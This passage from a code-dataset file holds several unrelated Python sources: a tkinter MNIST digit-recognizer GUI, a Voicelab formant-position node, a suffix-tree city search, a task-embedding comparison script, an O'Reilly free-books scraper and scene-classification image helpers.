fill='green')\n\t\telse:\n\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, fill='blue')\n\t\tif(y2 < 18):\n\t\t\tself.proba_canvas.create_text(x1 - 15, y2 + 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[0]), fill='white')\n\t\telse:\n\t\t\tself.proba_canvas.create_text(x1 - 15, y2 - 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[0]), fill='black')\n\n\t\t# for onthers digit\n\t\tfor i in range(1, 10):\n\t\t\tx1, y1 = x1 + 60, 280\n\t\t\tx2, y2 = x1 - 30, 280 - (280 * prob[i])\n\t\t\tif(digit == i):\n\t\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, fill='green')\n\t\t\telse:\n\t\t\t\tself.proba_canvas.create_rectangle(x1, y1, x2, y2, fill='blue')\n\t\t\tif(y2 < 18):\n\t\t\t\tself.proba_canvas.create_text(x1 - 15, y2 + 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[i]), fill='white')\n\t\t\telse:\n\t\t\t\tself.proba_canvas.create_text(x1 - 15, y2 - 10, font=('Helvetica', 10), text='{0:.2f}'.format(prob[i]), fill='black')\n\n\t\t# state of buttons after click predict button\n\n\t\tself.predict_button.configure(state='disabled')\n\t\tself.visualize_button.configure(state='normal')\n\n\tdef visualize(self):\n\t\ttop_level = tk.Toplevel()\n\t\timg = self.get_image()\n\n\t\tVisualize(top_level, self.model, 
img)\n\n\nclass Visualize:\n\tdef __init__(self, master, model, img):\n\t\tself.top_level = master\n\t\tself.top_level.title('Visualize outputs of each layers')\n\t\tself.top_level.geometry('1170x550')\n\t\tself.model = model\n\t\tself.img = img.reshape(28, 28, 1)\n\n\t\tself.window = self.create_frame_scrollbar(self.top_level) \n\t\tself.frame_for_conv2d_0 = self.create_frame_scrollbar(root=self.window, row=1, column=1, width=180, height=450)\n\t\tself.frame_for_conv2d_1 = self.create_frame_scrollbar(root=self.window, row=1, column=2, width=180, height=450)\n\t\tself.frame_for_max_pooling2d_0 = self.create_frame_scrollbar(root=self.window, row=1, column=3, width=180, height=450)\n\t\tself.frame_for_dense_0 = self.create_frame_scrollbar(root=self.window, row=1, column=4, width=120, height=450)\n\t\tself.frame_for_dense_1 = self.create_frame_scrollbar(root=self.window, row=1, column=5, width=120, height=450)\n\n\t\tself.create_labels()\n\n\t\tself.visualize_layer_output()\n\n\tdef create_frame_scrollbar(self, root, row=None, column=None, width=None, height=None, padx=None, pady=None, background=None):\n\t\tmain_frame = tk.Frame(root)\n\n\t\tcanvas = tk.Canvas(main_frame, width=width, height=height, bg=background)\n\n\t\tvscrollbar = ttk.Scrollbar(main_frame, orient='vertical', command=canvas.yview)\n\t\tvscrollbar.pack(side='right', fill='y')\n\t\tcanvas.pack(side='left', fill='both', expand=1)\n\t\tcanvas.configure(yscrollcommand=vscrollbar.set)\n\n\t\tif(row != None and column != None):\n\t\t\tmain_frame.grid(row=row, column=column, padx=padx, pady=pady)\n\t\telse:\n\t\t\tmain_frame.pack(fill='both', expand=1)\n\t\t\thscrollbar = ttk.Scrollbar(main_frame, orient='horizontal', command=canvas.xview)\n\t\t\thscrollbar.pack(side='bottom', fill='x')\n\t\t\tcanvas.pack(side='top', fill='both', expand=1)\n\t\t\tcanvas.configure(xscrollcommand=hscrollbar.set)\n\n\n\t\t# update the scrollable region whenever the canvas is resized\n\t\tcanvas.bind('<Configure>', lambda e: canvas.configure(scrollregion=canvas.bbox('all')))\n\n\t\tframe = tk.Frame(canvas)\n\n\t\tcanvas.create_window((0,0), window=frame, anchor='nw')\n\n\t\treturn frame\n\n\tdef create_labels(self):\n\t\tlabel_0 = tk.Label(self.window, text='Input: 28x28', font=('Helvetica', 10))\n\t\tlabel_1 = tk.Label(self.window, text='Conv2d_0: 24x24 ', font=('Helvetica', 10))\n\t\tlabel_2 = tk.Label(self.window, text='Conv2d_1: 12x12 ', font=('Helvetica', 10))\n\t\tlabel_3 = tk.Label(self.window, text='Max_pooling2d_0: 12x12 ', font=('Helvetica', 10))\n\t\tlabel_4 = tk.Label(self.window, text='Dense_0: 1x1 ', font=('Helvetica', 10))\n\t\tlabel_5 = tk.Label(self.window, text='Dense_1: 1x1 ', font=('Helvetica', 10))\n \n\t\tlabel_0.grid(row=0, column=0, pady=15)\n\t\tlabel_1.grid(row=0, column=1, pady=15)\n\t\tlabel_2.grid(row=0, column=2, pady=15)\n\t\tlabel_3.grid(row=0, column=3, pady=15)\n\t\tlabel_4.grid(row=0, column=4, pady=15)\n\t\tlabel_5.grid(row=0, column=5, pady=15)\n\n\tdef get_layer_ouput(self):\n\t\timg = self.img.reshape(1, 28, 28, 1)\n\t\tconv2d_0 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=0).output)\n\t\tconv2d_1 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=1).output)\n\t\tmax_pooling2d_0 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=2).output)\n\t\tdense_0 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=5).output)\n\t\tdense_1 = Model(inputs=self.model.input, outputs=self.model.get_layer(index=7).output)\n\t\n\t\tconv2d_0_output = conv2d_0.predict(img)[0]\n\t\tconv2d_1_output = 
conv2d_1.predict(img)[0]\n\t\tmax_pooling2d_0_output = max_pooling2d_0.predict(img)[0]\n\t\tdense_0_output = dense_0.predict(img)[0].reshape(1, 1, -1)\n\t\tdense_1_output = dense_1.predict(img)[0].reshape(1, 1, -1)\n\n\t\treturn (conv2d_0_output, conv2d_1_output, max_pooling2d_0_output, dense_0_output, dense_1_output)\n\n\tdef imshow_img(self, root, figsize, dpi=None, layer_output=None, name=None, row=None, column=None, padx=None, pady=None, background=None):\n\t\tif(layer_output is None):\n\t\t\tfig = Figure(figsize=figsize, dpi=dpi, tight_layout={'pad':0})\n\n\t\t\tax = fig.add_subplot(111)\n\t\t\tax.imshow(self.img, cmap='gray', vmin=0, vmax=1) \n\n\t\t\tax.axes.get_xaxis().set_visible(False)\n\t\t\tax.axes.get_yaxis().set_visible(False)\n\n\t\t\tcanvas = FigureCanvasTkAgg(fig, master=root)\n\t\t\tcanvas.get_tk_widget().grid(row=row, column=column, padx=padx, pady=pady)\n\t\telse:\n\t\t\tm, n, c = layer_output.shape \n\t\t\tprint(m, n, c)\n\t\t\tfig, ax = plt.subplots(nrows=c, ncols=1, figsize=figsize, dpi=dpi)\n\t\t\tfor i in range(c):\n\t\t\t ax[i].imshow(layer_output[:,:,i].reshape(m, n, 1), cmap='gray', vmin=0, vmax=1)\n\t\t\t ax[i].axes.get_xaxis().set_visible(False)\n\t\t\t ax[i].axes.get_yaxis().set_visible(False)\n\t\t\t ax[i].set_title(str(i), fontsize=10)\n\t\t\t print(name + '[{}]: done'.format(i))\n\t\t\tfig.set_facecolor(background)\n\t\t\tfig.tight_layout()\n\n\t\t\tcanvas = FigureCanvasTkAgg(fig, master=root) \n\t\t\tcanvas.get_tk_widget().pack()\n\n\tdef visualize_layer_output(self):\n\t\tself.imshow_img(root=self.window, figsize=(2, 2), dpi=100, row=1, column=0, padx=15, pady=15)\n\n\t\tconv2d_0_output, conv2d_1_output, max_pooling2d_0_output, dense_0_output, dense_1_output = self.get_layer_ouput()\n\n\t\tself.imshow_img(root=self.frame_for_conv2d_0, figsize=(1.85, 60), layer_output=conv2d_0_output, name='conv2d_0', background='red')\n\t\tself.imshow_img(root=self.frame_for_conv2d_1, figsize=(1.85, 120), layer_output=conv2d_1_output, name='conv2d_1', background='green')\n\t\tself.imshow_img(root=self.frame_for_max_pooling2d_0, figsize=(1.85, 120), layer_output=max_pooling2d_0_output, name='max_pooling2d_0', background='blue')\n\t\tself.imshow_img(root=self.frame_for_dense_0, figsize=(1.3, 250), layer_output=dense_0_output, name='dense_0', background='yellow')\n\t\tself.imshow_img(root=self.frame_for_dense_1, figsize=(1.3, 10), layer_output=dense_1_output, name='dense_1', background='purple')\n\n\nroot = tk.Tk()\nRecognizer(master=root)\nroot.mainloop()\n\n\n\n","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":11561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"86552960","text":"from Voicelab.pipeline.Node import Node\nfrom parselmouth.praat import call\nfrom Voicelab.toolkits.Voicelab.VoicelabNode import VoicelabNode\nfrom Voicelab.toolkits.Voicelab.MeasurePitchNode import measure_pitch\nfrom scipy import stats\nimport statistics\n\n\nclass MeasureFormantPositionsNode(VoicelabNode):\n def __init__(self, *args, **kwargs):\n \"\"\"\n Args:\n *args:\n **kwargs:\n \"\"\"\n super().__init__(*args, **kwargs)\n\n self.args = {\n # 'Method': 'formants_praat_manual'\n }\n\n self.state = {\n \"f1_mean_pf_list\": [],\n \"f2_mean_pf_list\": [],\n \"f3_mean_pf_list\": [],\n \"f4_mean_pf_list\": [],\n #'f1_median_pf_list': [],\n #'f2_median_pf_list': [],\n #'f3_median_pf_list': [],\n #'f4_median_pf_list': [],\n }\n\n # On each file we want to calculate the formants at the glottal pulses\n def 
process(self):\n\n        voice: object = self.args[\"voice\"]\n\n        # method = self.args['Method']\n        # pitch = self.args['Pitch']\n        formant_object = self.args[\"Formants\"]\n\n        pitch_floor = self.args[\"Pitch Floor\"]\n        pitch_ceiling = self.args[\"Pitch Ceiling\"]\n        pitch = measure_pitch(\n            voice=voice, measure=\"cc\", floor=pitch_floor, ceiling=pitch_ceiling\n        )\n\n        point_process = call(\n            [voice, pitch], \"To PointProcess (cc)\"\n        )  # Create PointProcess object\n        num_points = call(point_process, \"Get number of points\")\n\n        f1_list = []\n        f2_list = []\n        f3_list = []\n        f4_list = []\n        measurement_times = []\n\n        for point in range(0, num_points):\n            point += 1\n            t = call(point_process, \"Get time from index\", point)\n            measurement_times.append(t)\n            f1 = call(formant_object, \"Get value at time\", 1, t, \"Hertz\", \"Linear\")\n            f2 = call(formant_object, \"Get value at time\", 2, t, \"Hertz\", \"Linear\")\n            f3 = call(formant_object, \"Get value at time\", 3, t, \"Hertz\", \"Linear\")\n            f4 = call(formant_object, \"Get value at time\", 4, t, \"Hertz\", \"Linear\")\n            f1_list.append(f1)\n            f2_list.append(f2)\n            f3_list.append(f3)\n            f4_list.append(f4)\n\n        f1_list = [f1 for f1 in f1_list if str(f1) != \"nan\"]\n        f2_list = [f2 for f2 in f2_list if str(f2) != \"nan\"]\n        f3_list = [f3 for f3 in f3_list if str(f3) != \"nan\"]\n        f4_list = [f4 for f4 in f4_list if str(f4) != \"nan\"]\n\n        # calculate mean & median formants across pulses\n        if len(f1_list) > 0:\n            f1_mean_pf = sum(f1_list) / len(f1_list)\n            f1_median_pf = statistics.median(f1_list)\n        else:\n            f1_mean_pf = \"N/A\"\n            f1_median_pf = \"N/A\"\n\n        if len(f2_list) > 0:\n            f2_mean_pf = sum(f2_list) / len(f2_list)\n            f2_median_pf = statistics.median(f2_list)\n        else:\n            f2_mean_pf = \"N/A\"\n            f2_median_pf = \"N/A\"\n\n        if len(f3_list) > 0:\n            f3_mean_pf = sum(f3_list) / len(f3_list)\n            f3_median_pf = statistics.median(f3_list)\n        else:\n            f3_mean_pf = \"N/A\"\n            f3_median_pf = \"N/A\"\n\n        if len(f4_list) > 0:\n            f4_mean_pf = sum(f4_list) / len(f4_list)\n            f4_median_pf = statistics.median(f4_list)\n        else:\n            f4_mean_pf = \"N/A\"\n            f4_median_pf = \"N/A\"\n\n        results = {}\n\n        # collect all means and median values, these will be needed at the end to calculate the formant positions\n        self.state[\"f1_mean_pf_list\"].append(f1_mean_pf)\n        self.state[\"f2_mean_pf_list\"].append(f2_mean_pf)\n        self.state[\"f3_mean_pf_list\"].append(f3_mean_pf)\n        self.state[\"f4_mean_pf_list\"].append(f4_mean_pf)\n\n        # the median lists are not pre-declared in self.state, so create them on first use\n        self.state.setdefault(\"f1_median_pf_list\", []).append(f1_median_pf)\n        self.state.setdefault(\"f2_median_pf_list\", []).append(f2_median_pf)\n        self.state.setdefault(\"f3_median_pf_list\", []).append(f3_median_pf)\n        self.state.setdefault(\"f4_median_pf_list\", []).append(f4_median_pf)\n\n        return results\n\n    # Once all of the files have been processed, we want to calculate the position across all of them\n    def end(self, results):\n\n        \"\"\"\n        Args:\n            results:\n        \"\"\"\n        f1_mean_pf_list = self.state[\"f1_mean_pf_list\"]\n        f2_mean_pf_list = self.state[\"f2_mean_pf_list\"]\n        f3_mean_pf_list = self.state[\"f3_mean_pf_list\"]\n        f4_mean_pf_list = self.state[\"f4_mean_pf_list\"]\n\n        f1_median_pf_list = self.state.get(\"f1_median_pf_list\", [])\n        f2_median_pf_list = self.state.get(\"f2_median_pf_list\", [])\n        f3_median_pf_list = self.state.get(\"f3_median_pf_list\", [])\n        f4_median_pf_list = self.state.get(\"f4_median_pf_list\", [])\n\n        formant_mean_lists = [\n            f1_mean_pf_list,\n            f2_mean_pf_list,\n            f3_mean_pf_list,\n            f4_mean_pf_list,\n        ]\n        formant_median_lists = [\n            f1_median_pf_list,\n            f2_median_pf_list,\n            f3_median_pf_list,\n            f4_median_pf_list,\n        ]\n\n        # append it to the results of 
all of them\n        formant_positions = self.calculate_formant_position(formant_mean_lists, formant_median_lists)\n        for i, result in enumerate(results):\n            if isinstance(formant_positions, str):\n                results[i][self][\"Formant Position\"] = formant_positions\n            else:\n                results[i][self][\"Formant Position\"] = float(formant_positions[i])\n\n        return results\n\n    # to calculate the formant position we need the formants at glottal pulses for each file we ran\n    def calculate_formant_position(self, formant_mean_lists, formant_median_lists):\n        \"\"\"\n        Args:\n            formant_mean_lists:\n            formant_median_lists:\n        \"\"\"\n        if len(formant_mean_lists[0]) < 30:  # or len(formant_median_lists[0]) < 8:\n            return \"Not enough samples, requires at least 30\"\n\n        # Normality test for mean data\n        _, p_f1_mean = stats.normaltest(formant_mean_lists[0])\n        _, p_f2_mean = stats.normaltest(formant_mean_lists[1])\n        _, p_f3_mean = stats.normaltest(formant_mean_lists[2])\n        _, p_f4_mean = stats.normaltest(formant_mean_lists[3])\n        if p_f1_mean >= 0.5 or p_f2_mean >= 0.5 or p_f3_mean >= 0.5 or p_f4_mean >= 0.5:\n            return \"formants not normally distributed\"\n\n        else:\n            zf1_mean = stats.zscore(formant_mean_lists[0])\n            zf2_mean = stats.zscore(formant_mean_lists[1])\n            zf3_mean = stats.zscore(formant_mean_lists[2])\n            zf4_mean = stats.zscore(formant_mean_lists[3])\n            pf_mean = (zf1_mean + zf2_mean + zf3_mean + zf4_mean) / 4\n            return pf_mean\n\n        # normality test for median data\n        _, p_f1_median = stats.normaltest(formant_median_lists[0])\n        _, p_f2_median = stats.normaltest(formant_median_lists[1])\n        _, p_f3_median = stats.normaltest(formant_median_lists[2])\n        _, p_f4_median = stats.normaltest(formant_median_lists[3])\n\n        if (\n            p_f1_median >= 0.5\n            or p_f2_median >= 0.5\n            or p_f3_median >= 0.5\n            or p_f4_median >= 0.5\n        ):\n            return \"formants not normally distributed\"\n\n        else:\n            zf1_median = stats.zscore(formant_median_lists[0])\n            zf2_median = stats.zscore(formant_median_lists[1])\n            zf3_median = stats.zscore(formant_median_lists[2])\n            zf4_median = stats.zscore(formant_median_lists[3])\n\n            pf_median = (zf1_median + zf2_median + zf3_median + zf4_median) / 4\n            return pf_median\n","sub_path":"Voicelab/toolkits/Voicelab/MeasureFormantPositionsNode.py","file_name":"MeasureFormantPositionsNode.py","file_ext":"py","file_size_in_byte":7628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"182820330","text":"\"\"\"\nSuffix tree creation and usage methods\n\"\"\"\n\nfrom collections import defaultdict\nimport os\nimport suffixtree as st\nfrom src.utils.format_helper import clean_input_line, normalize_input\n\n\nclass SuffixTree:\n    COLUMN_ID = \"name\"\n    ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n    DATA_FILEPATH = os.path.join(ROOT_DIR, \"../../data/cities_canada-usa.tsv\")\n\n    def __init__(self):\n        \"\"\"Creates suffix tree in O(n) for n strings for constant-sized alphabets, O(1) for insertion in\n        hashmap \"\"\"\n        self.tree = st.SuffixTree(True, [])\n        self.children = defaultdict(list)\n\n        with open(self.DATA_FILEPATH, 'r', encoding='utf8') as file:\n            column_names = clean_input_line(next(file))\n            raw_inputs = [dict(zip(column_names, clean_input_line(line))) for line in file]\n\n        for child in raw_inputs:\n            self.tree.addStrings([normalize_input(child[self.COLUMN_ID])])\n            self.children[normalize_input(child[self.COLUMN_ID])].append(child)\n        self.tree = self.tree.createQueryTree()\n        self.tree.cacheNodes()\n\n    def search(self, key):\n        \"\"\"Returns tree dictionary and list of selected cities 
according to key parameter. Search is O(m),\n for m length of key \"\"\"\n selected_cities = set(self.tree.findString(key)) if len(key) > 0 else []\n return self.children, selected_cities\n","sub_path":"src/utils/suffix_tree.py","file_name":"suffix_tree.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"90479695","text":"#!/usr/bin/env python\n\n# Copyright 2017-2020 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n\nimport os\nfrom copy import deepcopy\nimport json\nimport sys\nfrom io import BytesIO\nimport argparse\nimport numpy as np\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\nfrom scipy.cluster import hierarchy\nfrom scipy.spatial.distance import squareform, pdist\nimport pickle\nimport task_similarity\nimport glob\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\n\nCUB = 'CUB'\nINAT = 'iNat'\nCUB_NUM_TASKS = 25\nADDITIONAL_TAXONOMY_DATA = [\n {\n 'kingdom': 'Animalia ',\n 'supercategory': 'Animalia ',\n 'phylum': 'Chordata',\n 'class': 'Aves',\n 'order': 'Apodiformes',\n }\n]\n\n\nCATEGORIES_JSON_FILE = 'inat2018/categories.json'\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('--cub-root', type=str)\nparser.add_argument('--inat-root', type=str)\nparser.add_argument('--data-root', type=str, default='/data')\nparser.add_argument('--distance', default='cosine', type=str,\n help='distance to use')\nargs = parser.parse_args()\n\ndef add_class_information(embeddings):\n # load taxonomy\n with open(os.path.join(args.data_root, CATEGORIES_JSON_FILE), 'r') as f:\n categories = json.load(f)\n categories.extend(ADDITIONAL_TAXONOMY_DATA)\n\n category_map = {c['order']: c for c in categories}\n category_map.update({c['family']: c for c in categories if 'family' in c})\n\n for e in embeddings:\n try:\n c = category_map[e.task_name]\n except:\n if 'Passeriformes' in e.task_name and '_' in e.task_name:\n c = category_map[e.task_name.split('_')[1]]\n else:\n raise\n e.meta['order'] = c['order'].lower()\n e.meta['class'] = c['class'].lower()\n e.meta['phylum'] = c['phylum'].lower()\n e.meta['kingdom'] = c['kingdom'].lower()\n e.meta['supercategory'] = c['supercategory'].lower()\n\n\ndef main():\n distance_matrices = []\n names = []\n root = args.cub_root\n files = glob.glob(os.path.join(root, '*/*/*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*/*', 'features.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'features.p'))\n embeddings = [task_similarity.load_embedding(file) for file in files]\n embeddings.sort(key=lambda x: x.meta['dataset']['task_id'])\n first_embeddings = deepcopy(embeddings[:25])\n\n root = args.inat_root\n files = glob.glob(os.path.join(root, '*/*/*', 
'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'embedding.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*/*', 'features.p'))\n if not files: files = glob.glob(os.path.join(root, '*/*', 'features.p'))\n # get embeddings\n embeddings = [task_similarity.load_embedding(file) for file in files]\n embeddings.sort(key=lambda x: x.meta['dataset']['task_id'])\n second_embeddings = deepcopy(embeddings[25:])\n embeddings = first_embeddings + second_embeddings\n assert(len(embeddings)==50)\n for e in embeddings:\n e.task_id = e.meta['dataset']['task_id']\n e.task_name = e.meta['task_name']\n e.dataset = CUB if e.task_id < CUB_NUM_TASKS else INAT\n add_class_information(embeddings)\n\n task_id_to_name = {e.task_id:e.task_name for e in embeddings}\n distance_matrix = task_similarity.pdist(embeddings, distance=args.distance)\n embeddings = np.array(embeddings)\n np.fill_diagonal(distance_matrix, 0.)\n distance_matrix = distance_matrix[:25, :50]\n new_names = [f\"[{e.dataset}] {e.task_name} ({e.meta['class']})\" if 'order' in e.meta\n else f\"[{e.dataset}] {e.task_name} ({e.meta['class']})\" for e in embeddings]\n new_names = [s.replace('Passeriformes_', '') for s in new_names]\n names = [n.lower() for n in new_names]\n error_mat = np.load('npy/breast_pattern_errs.npy')\n errors = { target_name:{source_name:error_mat[j][i] for j,source_name in enumerate(names)} for i,target_name in enumerate(names[:25])}\n for k,v in errors.items():\n optimal_err = np.inf\n for source_name, source_err in v.items():\n if source_name==k: continue\n else:\n optimal_err = min(optimal_err, source_err)\n errors[k]['optimal'] = optimal_err\n selected_errors = []\n optimal_errors = []\n random_errors = []\n closest_distances = []\n selected_experts = []\n self_errors = []\n for name_i, (distances, name) in enumerate(zip(distance_matrix, names)):\n distances[name_i] = 10e6\n closest_i = np.argmin(distances)\n closest_distances.append((name, distances[closest_i]))\n optimal_error = float(errors[name]['optimal'])\n selected_error = errors[name][names[closest_i]]\n random_error = np.average([errors[name][source] for source in names if source!=name])\n selected_errors.append(selected_error)\n random_errors.append(random_error)\n optimal_errors.append(optimal_error)\n self_errors.append(errors[name][name])\n selected_experts.append(closest_i)\n err_types = ['t2v', 'opt', 'rand', 'self']\n for err_list, err_type in zip((selected_errors, optimal_errors, random_errors, self_errors), err_types):\n print(\"Average Relative (per-task) Error\")\n print(err_type, average_relative_error(err_list, optimal_errors))\n\n\ndef average_relative_error(err_list, opt_list):\n return np.average(100 * (np.array(err_list) - np.array(opt_list)) / np.array(opt_list))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"accuracy_embeddings_cub_attributes.py","file_name":"accuracy_embeddings_cub_attributes.py","file_ext":"py","file_size_in_byte":6309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"566795300","text":"# Copyright 2017 Erik Jhordan Rey.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF 
ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nsys.path.insert(0, 'libs')\nimport logging\nimport json as simplejson\nfrom bs4 import BeautifulSoup\nfrom google.appengine.api import urlfetch\nimport webapp2\n\nclass MainHandler(webapp2.RequestHandler):\n\n global OREILLY_FREE_BOOKS_URL\n OREILLY_FREE_BOOKS_URL = \"http://www.oreilly.com/programming/free/\"\n global OREILLY_FREE_BOOKS_PAGE\n OREILLY_FREE_BOOKS_PAGE = urlfetch.fetch(OREILLY_FREE_BOOKS_URL, deadline=90).content\n global OREILLY_FREE_BOOKS_SECTIONS_SIZE\n OREILLY_FREE_BOOKS_SECTIONS_SIZE = 2\n\n def get(self):\n\n oreilly_page = BeautifulSoup(OREILLY_FREE_BOOKS_PAGE)\n\n oreilly_json = []\n sub_category_json = []\n books_download_json = []\n books_json = []\n\n divs_book_section = oreilly_page.findAll(\"div\", {\"class\":\"callout-row\"});\n\n for sections, div_book_section in enumerate(divs_book_section):\n\n if sections <= OREILLY_FREE_BOOKS_SECTIONS_SIZE:\n\n category = div_book_section.find(\"h3\")\n\n if not div_book_section.has_attr(\"style\"):\n\n sub_book_section = div_book_section.findAll(\"div\", style=\"margin:0 auto;\")\n sub_book_section += div_book_section.findAll(\"div\", style=\"max-width:760px; margin:0 auto;\")\n\n for sub_category in sub_book_section:\n\n sub_category_title = sub_category.find(\"h3\").text\n books = sub_category.findAll(\"a\")\n\n for book in books:\n create_book = Book(book)\n book_json = create_book.book_to_book_json_mapper()\n books_json.append(book_json)\n book_json = []\n\n sub_category_json.append({\"sub_category\": sub_category_title, \"books\": books_json})\n books_json = []\n\n oreilly_json.append({\"category\": category.text, \"sub_categories\": sub_category_json })\n\n else:\n \n books = div_book_section.findAll(\"a\")\n for book in books:\n create_book = Book(book)\n book_json = create_book.book_to_book_json_mapper()\n books_json.append(book_json)\n book_json = []\n\n oreilly_json.append({\"category\": category.text, \"books\": books_json})\n books_json = []\n\n self.response.write(simplejson.dumps(oreilly_json))\n self.response.headers['Content-Type'] = 'application/json'\n\nclass Book(object):\n\n def __init__(self, book):\n self.book = book\n\n def book_to_book_json_mapper(self):\n\n book_json = {}\n book_json['title'] = self.book.find('img')['alt']\n book_json['description'] = self.book.get('data-content')\n book_json['thumbnail'] = self.book.find('img')['src']\n href = self.book.get('href')\n book_json['href'] = href\n download_json = Download(href).href_to_download_json_mapper()\n if download_json:\n book_json['download'] = download_json\n\n return book_json\n\n\n\nclass Download(object):\n\n def __init__(self, href):\n self.href = href\n\n def href_to_download_json_mapper(self):\n HREF_START = \"http://www.oreilly.com/programming/free/\"\n HREF_END = \".csp\"\n OREILLY_BUCKET_PROGRAMMING = \"http://www.oreilly.com/programming/free/files/\"\n EXTENSION_EPUB = \".epub\"\n EXTENSION_MOBI = \".mobi\"\n EXTENSION_PDF = \".pdf\"\n books_download_json = []\n\n if HREF_START in self.href:\n book_href_title = (self.href.split(HREF_START))[1].split(HREF_END)[0]\n book_epub = OREILLY_BUCKET_PROGRAMMING + book_href_title + EXTENSION_EPUB\n book_mobi = OREILLY_BUCKET_PROGRAMMING + book_href_title + EXTENSION_MOBI\n book_pdf = OREILLY_BUCKET_PROGRAMMING + book_href_title + EXTENSION_PDF\n books_download_json.append({\"epub\": book_epub, \"mobi\": book_mobi , \"pdf\": book_pdf 
})\n\n\n return books_download_json\n\n\napp = webapp2.WSGIApplication([\n ('/oreilly-free', MainHandler)\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"350016907","text":"import cv2\nimport numpy as np\nimport glob\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom operator import itemgetter\nimport matplotlib\nfrom keras.utils import to_categorical\nfrom sklearn.metrics import confusion_matrix\n\nlabel_type = ['Kitchen', 'Store', 'Bedroom', 'LivingRoom', 'Office',\n 'Industrial', 'Suburb', 'InsideCity', 'TallBuilding', 'Street',\n 'Highway', 'OpenCountry', 'Coast', 'Mountain', 'Forest']\n\ndef get_data(gray=True,size=None, normal=False):\n\n train_x = []\n test_x = []\n\n train_y = []\n test_y = []\n\n size = size\n\n for index, label in enumerate(label_type):\n training_imgs = glob.glob('hw5_data/train/{}/*.jpg'.format(label))\n testing_imgs = glob.glob('hw5_data/test/{}/*.jpg'.format(label))\n for fname in training_imgs:\n train_y.append(index)\n img = cv2.imread(fname)\n if gray:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if size!=None:\n \t img = cv2.resize(img, (size,size)).reshape((size,size,1))/255.0\n elif size!=None:\n img = cv2.resize(img, (size,size)).reshape((size,size,3))/255.0\n if normal:\n img = cv2.normalize(img, img, 0, 255, cv2.NORM_MINMAX)\n train_x.append(img)\n \n for fname in testing_imgs:\n test_y.append(index)\n img = cv2.imread(fname)\n if gray:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n if size!=None:\n img = cv2.resize(img, (size,size)).reshape((size,size,1))/255.0\n elif size!=None:\n img = cv2.resize(img, (size,size)).reshape((size,size,3))/255.0\n if normal:\n img = cv2.normalize(img, img, 0, 255, cv2.NORM_MINMAX)\n test_x.append(img)\n if size!=None:\n train_x = np.array(train_x).astype(np.float32)\n test_x = np.array(test_x).astype(np.float32)\n train_y = np.array(train_y).astype(np.float32)\n test_y = np.array(test_y).astype(np.float32)\n \n return(train_x,train_y,test_x,test_y)\n\ndef plot_heatmap(true_y, pred_y, save_dir):\n true_y = [label_type[x] for x in true_y]\n pred_y = [label_type[x] for x in pred_y]\n sns.heatmap(confusion_matrix(true_y, pred_y, labels=label_type, normalize='true'),xticklabels=label_type,yticklabels=label_type)\n plt.tight_layout()\n plt.savefig(save_dir)\n\ndef plot_res(true_y, pred_y, save_dir='res'):\n \n def unique_by_key(elements, key=None):\n if key is None:\n # no key: the whole element must be unique\n key = lambda e: e\n return list({key(el): el for el in elements}.values())\n\n true_y = [label_type[x] for x in true_y]\n pred_y = [label_type[x] for x in pred_y]\n\n train = []\n test = []\n\n train_dict = {}\n test_dict = {}\n\n for index, label in enumerate(label_type):\n training_imgs = glob.glob('hw5_data/train/{}/*.jpg'.format(label))\n testing_imgs = glob.glob('hw5_data/test/{}/*.jpg'.format(label))\n for fname in training_imgs:\n img = cv2.imread(fname)\n train.append(img)\n if label not in train_dict:\n train_dict[label] = img\n\n for fname in testing_imgs:\n img = cv2.imread(fname)\n test.append(img)\n if label not in test_dict:\n test_dict[label] = img\n \n false_negative = {k:[] for k in label_type}\n false_positive = {k:[] for k in 